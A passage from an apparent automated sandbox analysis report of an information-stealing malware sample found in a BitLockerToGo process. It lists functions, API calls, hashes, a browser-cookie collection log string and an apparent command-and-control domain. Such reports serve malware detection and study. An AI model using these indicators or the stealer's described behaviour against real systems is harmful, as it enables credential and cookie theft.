258fdc-258fe1 521->528 523 258f40-258f49 522->523 523->521 523->523 529 258fa0-258fda 527->529 530 258fe3-258fe7 528->530 531 258ffd 528->531 529->528 529->529 532 258ff0-258ff9 530->532 533 259000-25900b 531->533 532->532 534 258ffb 532->534 535 259028-259034 533->535 534->533 536 2590ca-259116 535->536 537 25903a-259040 535->537 540 25915e-259163 536->540 541 259118 536->541 538 259010-259012 537->538 539 259042-259053 537->539 545 259017-259022 538->545 546 259055-259058 539->546 547 259080-259088 539->547 543 259165-259166 540->543 544 25917b-25917e call 25c4d0 540->544 542 259120-25915c 541->542 542->540 542->542 548 259170-259179 543->548 553 259183-2591a6 544->553 545->535 550 2590c6-2590c8 545->550 546->547 551 25905a-259075 546->551 547->545 552 25908a-2590c1 547->552 548->544 548->548 550->536 551->545 552->545
                APIs
                • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 00258C7F
                • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 00258D9F
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: ComputerName
                • String ID: C@@I$~H@^
                • API String ID: 3545744682-4183127737
                • Opcode ID: 40db6bf8cd5ca8e4e63e829d25f93f7d06c3f9d5189734c7bd6c718e0058fe7b
                • Instruction ID: 0cce9864cea07caaed9a87717f90ec85729f34c60229c38869cf2967a5fda539
                • Opcode Fuzzy Hash: 40db6bf8cd5ca8e4e63e829d25f93f7d06c3f9d5189734c7bd6c718e0058fe7b
                • Instruction Fuzzy Hash: DAF19D70110B828FD725CF29C490B62FBF1BF56305F188A8DD8E68B792CB75A859CB54
                Function 00250FBC Relevance: 6.7, Strings: 5, Instructions: 456COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 554 250fbc-25113f 555 251141 554->555 556 25119f-2511b9 call 26ae40 554->556 557 251150-25119d 555->557 560 251305 556->560 561 2511c0-2511e7 call 26b270 556->561 562 251200-25120a 556->562 563 251220-251253 call 267680 556->563 564 2512e0-2512f1 call 26ae40 556->564 565 2513e0-2513e8 556->565 566 251280-25128a 556->566 567 2511ee 556->567 568 2514ea-2514fd call 238b80 556->568 569 251516-251563 556->569 570 251291-25129c 556->570 571 2512d1 556->571 572 251510 556->572 573 251310-25135b 556->573 574 2513d0 556->574 575 2513d2-2513d7 556->575 576 2513de 556->576 557->556 557->557 561->560 561->563 561->564 561->565 561->566 561->567 561->568 561->569 561->570 561->571 561->572 561->573 561->574 561->575 561->576 562->563 600 251258-25126d 563->600 603 2512f6-2512fe 564->603 583 251401-25143f 565->583 584 2513ea-2513ef 565->584 566->560 566->564 566->565 566->566 566->568 566->569 566->570 566->571 566->572 566->573 566->574 566->575 566->576 577 251644-251653 566->577 578 251617-251628 566->578 579 251630-251632 566->579 580 251660-251671 566->580 581 25163d 566->581 567->562 568->560 568->564 568->565 568->566 568->569 568->570 568->571 568->572 568->573 568->574 568->575 568->576 568->577 568->578 568->579 568->580 568->581 582 251678-251685 568->582 591 251565 569->591 592 2515b1-2515b9 569->592 587 2512a3-2512bd call 238b70 call 26af90 570->587 588 25129e 570->588 593 2513a5-2513ba call 26b930 573->593 594 25135d-25135f 573->594 575->565 575->566 575->568 575->576 575->577 575->578 575->579 575->580 575->581 575->582 576->565 577->560 577->564 577->565 577->566 577->568 577->569 577->570 577->571 577->572 577->573 577->574 577->575 577->576 577->577 577->578 577->579 577->580 577->581 578->577 578->579 578->580 578->581 578->582 579->581 580->577 580->578 580->579 580->580 580->581 580->582 581->577 598 251441 583->598 599 251490-251498 583->599 596 2513f0-2513ff 584->596 624 2512c2-2512ca 587->624 588->587 604 251570-2515af 591->604 605 251600-251610 call 26a360 592->605 606 2515bb-2515c7 592->606 609 2513bf-2513c8 593->609 607 251360-2513a3 594->607 596->583 596->596 611 251450-25148e 598->611 612 2514e0 599->612 613 25149a-2514a5 599->613 600->560 600->564 600->565 600->566 600->568 600->569 600->570 600->571 600->572 600->573 600->574 600->575 600->576 600->577 600->578 600->579 600->581 603->560 603->565 603->566 603->568 603->573 603->574 603->575 603->576 603->577 603->578 603->579 603->580 603->581 603->582 604->592 604->604 605->577 605->578 605->579 605->580 605->581 605->582 608 2515d0-2515d7 606->608 607->593 607->607 615 2515e0-2515e6 608->615 616 2515d9-2515dc 608->616 609->574 611->599 611->611 612->568 618 2514b0-2514b7 613->618 615->605 621 2515e8-2515fa call 267840 615->621 616->608 620 2515de 616->620 622 2514c0-2514c6 618->622 623 2514b9-2514bc 618->623 620->605 621->605 622->612 627 2514c8-2514df call 267840 622->627 623->618 626 2514be 623->626 624->560 624->564 624->565 624->566 624->568 624->571 624->573 624->574 624->575 624->576 624->577 624->578 624->579 624->580 624->581 624->582 626->612 627->612
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: )E({$1I1O$1M9C$6A6G$:U"K
                • API String ID: 0-2515482740
                • Opcode ID: 0e053627b820832c178c70764854b2aca3cce5e0b81dc7b59eb4f69ac3346932
                • Instruction ID: 6ef6893b52d037ea028a36139fe27dfdf7ddd667e82efd3c69ccdd1586d56a0b
                • Opcode Fuzzy Hash: 0e053627b820832c178c70764854b2aca3cce5e0b81dc7b59eb4f69ac3346932
                • Instruction Fuzzy Hash: 3AF199B0228341DFE724CF24D894B6BBBE1FBC5344F14892CE9898B2A1DB74D855CB56
                Function 0024709B Relevance: 5.8, Strings: 4, Instructions: 782COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 631 24709b-2470dc 632 247134-247196 call 245c00 631->632 633 2470de-2470df 631->633 637 2471f2-247286 call 245c00 632->637 638 247198 632->638 634 2470e0-247132 633->634 634->632 634->634 642 2472f6-24736c call 245c00 637->642 643 247288 637->643 639 2471a0-2471f0 638->639 639->637 639->639 647 24736e-24736f 642->647 648 2473cf-24743a call 245c00 642->648 644 247290-2472f4 643->644 644->642 644->644 649 247370-2473cd 647->649 652 24743c-24743f 648->652 653 247488-2474b9 648->653 649->648 649->649 654 247440-247486 652->654 655 2474c0-2474c9 653->655 654->653 654->654 655->655 656 2474cb-2474dd 655->656 657 247994-247999 656->657 658 2474e3-2474e8 656->658 659 24799c-2479ad call 238b70 657->659 658->659 662 2479d1-2479e4 659->662 663 2479af-2479b4 659->663 665 2479e6-2479ed 662->665 666 247a03 662->666 664 2479c0-2479cf 663->664 664->662 664->664 667 2479f0-2479ff 665->667 668 247a06-247a0d 666->668 667->667 669 247a01 667->669 670 247a24-247a40 call 263660 call 245c00 668->670 669->668 674 247a45-247a4b 670->674 675 247a85-247aa4 call 238b80 674->675 676 247a10-247a1b 674->676 677 247a60-247a69 674->677 678 247a70-247a7b 674->678 679 247a52-247a59 674->679 680 247a22 674->680 681 247d52 674->681 682 247d3d-247d4b 674->682 683 247bde-247c86 674->683 684 247aab-247b2e 674->684 675->681 675->684 676->675 676->677 676->678 676->680 676->681 676->682 676->683 676->684 677->675 677->678 677->681 677->682 677->683 677->684 678->675 679->675 679->677 679->678 679->680 679->681 679->682 679->683 679->684 680->670 690 247d57 681->690 682->681 682->684 685 247ce7-247cef 683->685 686 247c88 683->686 688 247b30-247b88 684->688 689 247b8a-247bba 684->689 692 247cf0-247cf6 685->692 691 247c90-247ce5 686->691 688->688 688->689 694 247bc0-247bc9 689->694 695 247d5a-247d6b call 238b70 690->695 691->685 691->691 692->692 696 247cf8-247cff 692->696 694->694 697 247bcb-247bce 694->697 703 247d91-247da1 695->703 704 247d6d-247d72 695->704 699 247d21-247d34 696->699 700 247d01-247d06 696->700 697->690 701 247bd4-247bd9 697->701 699->682 705 247d10-247d1b 700->705 701->695 707 247dc1-247e09 703->707 708 247da3-247daa 703->708 706 247d80-247d8f 704->706 705->705 709 247d1d-247d1f 705->709 706->703 706->706 711 247e4c-247e77 707->711 712 247e0b 707->712 710 247db0-247dbf 708->710 709->699 710->707 710->710 714 247e80-247e89 711->714 713 247e10-247e4a 712->713 713->711 713->713 714->714 715 247e8b-247e96 714->715 716 247ea0-247ea9 715->716 716->716 717 247eab-247eb7 716->717 718 247ec0-247ec4 717->718 719 247eb9-247ebe 717->719 720 247ec7-247eda call 238b70 718->720 719->720 723 247f01-247f0f 720->723 724 247edc-247ee3 720->724 726 247f31-247f3e 723->726 727 247f11-247f14 723->727 725 247ef0-247eff 724->725 725->723 725->725 729 247f40-247f46 726->729 730 247f63 726->730 728 247f20-247f2f 727->728 728->726 728->728 731 247f50-247f5f 729->731 732 247f65-247f9d 730->732 731->731 733 247f61 731->733 734 247f9f 732->734 735 247fdb-248034 call 24b540 732->735 733->732 737 247fa0-247fd9 734->737 737->735 737->737
                Strings
                • (, xrefs: 00247C5E
                • bK, xrefs: 00247223
                • [info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 00247CE7
                • zy, xrefs: 00247172
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: ($[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser$bK$zy
                • API String ID: 0-201287715
                • Opcode ID: ef951401f10c4ad3ba310d74e664e437bc532f0a26884c7ff4f82f94850f2d18
                • Instruction ID: 98aa773badf54307be971ed449613e0b5b457a7a2f3ac802cb40319e0e756a97
                • Opcode Fuzzy Hash: ef951401f10c4ad3ba310d74e664e437bc532f0a26884c7ff4f82f94850f2d18
                • Instruction Fuzzy Hash: 7F5298B16183418BD728CF14C49076BBBE2FFC5358F18891CE8DA9B391E7349959CB86
                Function 0024662A Relevance: 4.3, Strings: 3, Instructions: 535COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: # '"$..$8
                • API String ID: 0-2078804138
                • Opcode ID: ce146192f420846baf2a8adff7522c9e6a1bddcd6a961f533d13c285e8f66db9
                • Instruction ID: 2e4ac73aa4b70d1afc9e9553ad8b4c8c89e10e7e7efc1961a8f2621d6a8c5c0b
                • Opcode Fuzzy Hash: ce146192f420846baf2a8adff7522c9e6a1bddcd6a961f533d13c285e8f66db9
                • Instruction Fuzzy Hash: 2B02B7B29283428FD704DF28D885A6BB7E1FF86308F08492DF49587251E775D929CB93
                Function 00263425 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON
                Download Yara Rule
                APIs
                • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00263495
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: InformationVolume
                • String ID: \
                • API String ID: 2039140958-2967466578
                • Opcode ID: 8dd77cf3231da489d40f786eb88a00d3723f290159b009829298c694924614ac
                • Instruction ID: f63fc3f7949787d4f4e8fa34d33f58cb2ecf81993473699f3627945abfe85549
                • Opcode Fuzzy Hash: 8dd77cf3231da489d40f786eb88a00d3723f290159b009829298c694924614ac
                • Instruction Fuzzy Hash: E5011D74695340FAF6249F10ED0BF2AB6A5AB84F08F20981CB34C7A1D1DAF0B955CA5D
                Function 00234C50 Relevance: 2.9, Strings: 2, Instructions: 402COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: )$IEND
                • API String ID: 0-707183367
                • Opcode ID: d20be4de738b4abbba78e0010ba43acb04f9904f8ebe33d724b347dde21e6c9e
                • Instruction ID: 4c82c90b6f608a9782aa34ff18105d9facb7dc25a84a082fb6e1b07d99d90d3d
                • Opcode Fuzzy Hash: d20be4de738b4abbba78e0010ba43acb04f9904f8ebe33d724b347dde21e6c9e
                • Instruction Fuzzy Hash: 2DE1F0B1A183459FD710DF28D88075BBBE1AB98308F14892DF9989B382D775ED15CBC2
                Function 00246790 Relevance: 2.9, Strings: 2, Instructions: 400COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: # '"$..
                • API String ID: 0-4124739383
                • Opcode ID: 59a402ad5122dd026dd375a25ad053e46d45a5f9e7908db39dc8215441c5ed5c
                • Instruction ID: c96681353bd8c0a10138dfc6bd8ff4fe8bc7657d6371812f1b78bec2395f7a32
                • Opcode Fuzzy Hash: 59a402ad5122dd026dd375a25ad053e46d45a5f9e7908db39dc8215441c5ed5c
                • Instruction Fuzzy Hash: D7D1B7B19283428BC708DF28D88566BB7E1FF86308F08492DE89597351E775D929CB93
                Function 00251910 Relevance: 2.9, Strings: 2, Instructions: 399COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: Psm`$avub
                • API String ID: 0-1111646547
                • Opcode ID: 0516f83b62a76c7914842f728a13b4d13d4e0290d24b932dacc389e318782292
                • Instruction ID: 1c7ae2673d10f042ccc5262cdd260a56f664bf81297cb6044323f7421578496e
                • Opcode Fuzzy Hash: 0516f83b62a76c7914842f728a13b4d13d4e0290d24b932dacc389e318782292
                • Instruction Fuzzy Hash: D1C1F1B1A283028BD714DF18C891B2BB7E1EF94356F144A2DE8C587351E375DC68CB9A
                Function 00245C00 Relevance: 2.9, Strings: 2, Instructions: 366COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID: 2]$$gdeb
                • API String ID: 0-447610410
                • Opcode ID: 6e306f29005c97e8c1dcfd278a4e092b541f7c9d9d2b4756df2857c574420c0b
                • Instruction ID: 5e0884013899abf3b663acb38ccc78a68d3ab33fd3f89096d86d12dfb7328a5f
                • Opcode Fuzzy Hash: 6e306f29005c97e8c1dcfd278a4e092b541f7c9d9d2b4756df2857c574420c0b
                • Instruction Fuzzy Hash: 81A12571A24321DBC728DF18CC9267BB3A1FF95314F49452CF8C68B292E7349920C792
                Function 00246CD0 Relevance: 1.8, APIs: 1, Instructions: 305encryptionCOMMON
                Download Yara Rule
                APIs
                • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00246E95
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: CryptDataUnprotect
                • String ID:
                • API String ID: 834300711-0
                • Opcode ID: b5d32d1a92acb50e6fc49fb51257e74ceee8de3a7188df1da9336d643bf4d166
                • Instruction ID: df060103b00b8ed06e3a53df980447bc7141fa3a086a9461bade0a4263fa7525
                • Opcode Fuzzy Hash: b5d32d1a92acb50e6fc49fb51257e74ceee8de3a7188df1da9336d643bf4d166
                • Instruction Fuzzy Hash: E8A1E0B1A18381CFC718CF18C851A6BBBE2EF86354F08495DF4968B791D770E855CB82
                Function 00265512 Relevance: 1.5, APIs: 1, Instructions: 14memoryCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(?,00000000), ref: 00265516
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 446bb3dd99f337085344ef983c6628913db96edda16ac3f53183ab26ac6adaf0
                • Instruction ID: ac7eadb5fe761144490fdffd129b6458afa4957a17de2a4ef8715d903eb135b2
                • Opcode Fuzzy Hash: 446bb3dd99f337085344ef983c6628913db96edda16ac3f53183ab26ac6adaf0
                • Instruction Fuzzy Hash: B9C08C30AD840056E10CCF10EC20F32F26E8B86309F14A008800923392C4A0D492511C
                Function 00267840 Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                Download Yara Rule
                APIs
                • LdrInitializeThunk.NTDLL(0026A75C,005C003F,00000006,00120089,?,00000018,8A858487,00000000,00245CFA), ref: 00267866
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
                • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82
                Function 00248088 Relevance: .5, Instructions: 500COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c05a0fcfc4dd6fdb13bd668f8f81325eadacf9737250c536f16cf8726166f1f7
                • Instruction ID: 6fad488f3b93b0bf76c56b14df0fbeddc09ce30f520b7d96b5202747010dbd2b
                • Opcode Fuzzy Hash: c05a0fcfc4dd6fdb13bd668f8f81325eadacf9737250c536f16cf8726166f1f7
                • Instruction Fuzzy Hash: 0DE1F4B1620701CFC728CF18C8A1A66B7F1FF99314B19859DD89A8F791EB74E851CB90
                Function 0024AF90 Relevance: .2, Instructions: 153COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 063b7e355c6ed8e3c2d4d90a9fe9593c05cd03a15dc1441d82070766a1440bd6
                • Instruction ID: ed9727127b00cf5759180b253bf337447d1951f627b925255942ec3157cd336e
                • Opcode Fuzzy Hash: 063b7e355c6ed8e3c2d4d90a9fe9593c05cd03a15dc1441d82070766a1440bd6
                • Instruction Fuzzy Hash: C24133715183118BC304CF18D8946ABB7F0EFC6769F048A1CF8A94B2A1E774C999C792
                Function 0025E089 Relevance: .0, Instructions: 22COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8a54390c2ce96f46f118c01d70b6a37f7567bf6128a91dbf51fae7463c3fea1c
                • Instruction ID: a38bc8e61b8f595f325b4bced9e355af624e748b149093a0c2e6b2f6f6c575e3
                • Opcode Fuzzy Hash: 8a54390c2ce96f46f118c01d70b6a37f7567bf6128a91dbf51fae7463c3fea1c
                • Instruction Fuzzy Hash: 53F03AB4518341CFC320DF24C50838BB7E4BB84314F418A1CD8A847254DBB1A5848F82
                Function 0023A310 Relevance: 119.7, APIs: 1, Strings: 67, Instructions: 709libraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 23a310-23a3b3 1 23a3b5 0->1 2 23a40e-23a44d LoadLibraryExW call 266b20 0->2 3 23a3b7-23a40a 1->3 7 23a463-23a5c2 call 2699c0 * 12 2->7 8 23a44f-23a45e 2->8 3->3 5 23a40c 3->5 5->2 35 23a5c4-23a5d4 7->35 11 23b047-23b057 8->11 36 23a5d6-23a5e0 35->36 37 23a5e5-23a625 call 263960 35->37 40 23a728-23a72f 36->40 43 23a627-23a631 37->43 40->11 42 23a735-23aad4 40->42 48 23ab26-23ab47 call 23bb70 42->48 49 23aad6 42->49 43->43 44 23a633-23a64d 43->44 46 23a651-23a655 44->46 47 23a64f 44->47 51 23a657-23a65a 46->51 50 23a6a4-23a6b3 call 23b060 47->50 65 23ab49 48->65 66 23ab4e-23acab call 238d10 call 239280 48->66 53 23aad8-23ab22 49->53 57 23a6b8-23a6ba 50->57 54 23a660-23a6a0 call 23f300 51->54 55 23a65c-23a65e 51->55 53->53 58 23ab24 53->58 54->51 59 23a6a2 54->59 55->59 62 23a6be-23a6e8 call 23bb30 57->62 63 23a6bc-23a6f2 57->63 58->48 59->50 73 23a6f4-23a6fd 62->73 63->73 67 23b03a-23b03f 65->67 81 23ad03-23ad2e call 23c360 66->81 82 23acad 66->82 67->11 79 23a707-23a70c 73->79 80 23a6ff 73->80 83 23a726 79->83 84 23a70e-23a721 79->84 80->79 96 23ad30 81->96 97 23ad35-23ad97 81->97 86 23acaf-23acff 82->86 83->40 84->35 86->86 89 23ad01 86->89 89->81 100 23affb-23b00c call 265540 96->100 98 23ad99 97->98 99 23adfe-23ae24 call 23c360 97->99 101 23ad9b-23adfa 98->101 107 23ae2a-23ae58 call 238da0 99->107 108 23aff9 99->108 109 23b021-23b029 100->109 110 23b00e-23b01f 100->110 101->101 104 23adfc 101->104 104->99 118 23ae60-23ae6d 107->118 108->100 111 23b02b-23b036 109->111 110->111 111->11 119 23b038 111->119 120 23ae6f-23af3e 118->120 121 23ae7c-23ae9d 118->121 119->67 124 23af40-23af4a 120->124 130 23aeea-23aeee 121->130 131 23ae9f-23aeb0 121->131 124->124 126 23af4c-23af66 124->126 128 23af6a-23af6e 126->128 129 23af68 126->129 135 23af70-23af73 128->135 134 23afbd-23afd3 call 23b060 129->134 133 23aef0-23af11 130->133 136 23aeb2 131->136 137 23aeb4-23aee8 131->137 133->118 147 23afd7-23aff7 call 23bb30 134->147 148 23afd5 134->148 140 23af75-23af77 135->140 141 23af79-23afb9 call 23f300 135->141 136->130 137->133 144 23afbb 140->144 141->135 141->144 144->134 147->108 148->108
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: LibraryLoad
                • String ID: !$"$'$'$'$($($+$-$3$3$3$3$5$5$6$8$:$<$?$A$A$A$B$B$C$C$C$E$F$G$G$I$K$L$M$O$R$S$Z$`$a$c$citizencenturygoodwk.shop$e$g$i$k$k$m$m$o$p$q$q$s$s$u$u$w$w$y$y${${$}$}
                • API String ID: 1029625771-3154137496
                • Opcode ID: 490b7e71eda077f76078e9786c51cf1846d9015ff303bba7483922951dd7bba2
                • Instruction ID: 522ef9650e23957391ec5def440f5cedc8b4928b425ca010f36bb0a98224d6d4
                • Opcode Fuzzy Hash: 490b7e71eda077f76078e9786c51cf1846d9015ff303bba7483922951dd7bba2
                • Instruction Fuzzy Hash: A2822AB011C7C1CED331CB28888879BBFE1AB96314F144A6DE0E98B392D7B58555DB63
                Function 00258A53 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: FreeLibrary
                • String ID: #v
                • API String ID: 3664257935-554117064
                • Opcode ID: 0c5a253c5be72396f6ffe038e987eaa6476e22734d6e934a754e1dd02dce449c
                • Instruction ID: 772066457c44ad8af1d230426251f640f738c82b6a5d211149d7ae85e0700aed
                • Opcode Fuzzy Hash: 0c5a253c5be72396f6ffe038e987eaa6476e22734d6e934a754e1dd02dce449c
                • Instruction Fuzzy Hash: C8319C74110742CFDB25CF29C490B22FBF1AF16305F18898DD8D69B796CBB5A859CB21
                Function 002391F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33COMMON
                Download Yara Rule
                APIs
                Strings
                • system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways, xrefs: 00239222
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: ExitProcess
                • String ID: system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways
                • API String ID: 621844428-780655312
                • Opcode ID: d3d1fd7f57641e523e14f1145ecc7d6e8faa98e4eb7e413a7a8267f5ff811ded
                • Instruction ID: e9c39ec8c38067c2f27cd5b5bf2a29b7e9e0bc9fcbe5635134cc49f83be69832
                • Opcode Fuzzy Hash: d3d1fd7f57641e523e14f1145ecc7d6e8faa98e4eb7e413a7a8267f5ff811ded
                • Instruction Fuzzy Hash: 6EF0E5F0D38E04A6CA507BB9A7072AF37A85F13304F504522ED8151102EBF188F56EA3
                Function 0025AB20 Relevance: 1.6, APIs: 1, Instructions: 100memoryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: AllocString
                • String ID:
                • API String ID: 2525500382-0
                • Opcode ID: 9f5c6f7d9bbf59e1d152cb43af99d4aa355fe435d8d7da797c2d16536c2ec58b
                • Instruction ID: 9c0c54d73b657763503d38e0232e8c7211650754b796d894c7cb4008a7dd1fb6
                • Opcode Fuzzy Hash: 9f5c6f7d9bbf59e1d152cb43af99d4aa355fe435d8d7da797c2d16536c2ec58b
                • Instruction Fuzzy Hash: 91411870208B829FD325CF3DC894746FBA16B5A224F048B5CE0F98BBE1D734A555CB92
                Function 00267502 Relevance: 1.6, APIs: 1, Instructions: 72libraryCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryExW.KERNELBASE(?,00000000,00000800), ref: 00267568
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: 5611aba2e3efb2b86284b31005bf5c07c4859124d0789c9155530fe034e10275
                • Instruction ID: 60e396cf266ad0a4f535f22470b7928b5915ae9a48ab1d330dc62233c67432a7
                • Opcode Fuzzy Hash: 5611aba2e3efb2b86284b31005bf5c07c4859124d0789c9155530fe034e10275
                • Instruction Fuzzy Hash: CA217C30715B008BD724CF28C9D1B52B7E2FB45704B14896ED8AB87B92DB64F8468B04
                Function 00266FA4 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                Download Yara Rule
                APIs
                • GetLogicalDrives.KERNELBASE ref: 00266FA4
                Memory Dump Source
                • Source File: 00000003.00000002.2327962631.0000000000230000.00000040.00000400.00020000.00000000.sdmp, Offset: 00230000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_230000_BitLockerToGo.jbxd
                Similarity
                • API ID: DrivesLogical
                • String ID:
                • API String ID: 999431828-0
                • Opcode ID: 1b73541f5bcff43ebe26c7557c971eedb3bfbd08542f464fdd940f7d0dcb51aa
                • Instruction ID: 19ac0a8b2ae86bf04e045aacfca676a4f9425671ef34c544b2dceed50b1b1553
